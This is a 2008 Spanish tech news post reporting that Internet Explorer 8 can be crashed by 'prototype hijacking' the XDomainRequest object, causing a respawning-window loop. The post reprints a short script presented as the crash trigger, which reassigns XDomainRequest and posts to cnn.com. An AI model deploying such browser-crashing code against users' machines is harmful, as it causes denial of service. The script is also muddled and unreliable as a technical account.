Colgar Internet Explorer 8 fácilmente

Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una característica nueva que permiten las llamadas XML entre dominios. Este ataque es similar al de XMLHttpRequest, del año 2006. Internet Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, provocando así un ataque infinito, teniendo como […].

Antonio Paredes / 01.04.2008 / 3:22 pm

Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una característica nueva que permiten las llamadas XML entre dominios. Este ataque es similar al de XMLHttpRequest, del año 2006.

Internet Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, provocando así un ataque infinito, teniendo como única solución: reiniciar el sistema.

El ataque puede realizarse con el siguiente código:

<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
Compartir noticia

TECNOLOGÍA 21

Medio especializado en publicaciones tecnológicas con enfoque en negocios desde 2007.

Nuestro alcance principal comprende Iberoamérica.

Reservar atención online

SERVICIOS

Publicidad para empresas
Coberturas y entrevistas
Análisis de productos y servicios

RESERVAR ATENCIÓN

Noticias de tecnología y negocios
Enlaces Archivo / Condiciones

Estás viendo: “Colgar Internet Explorer 8 fácilmente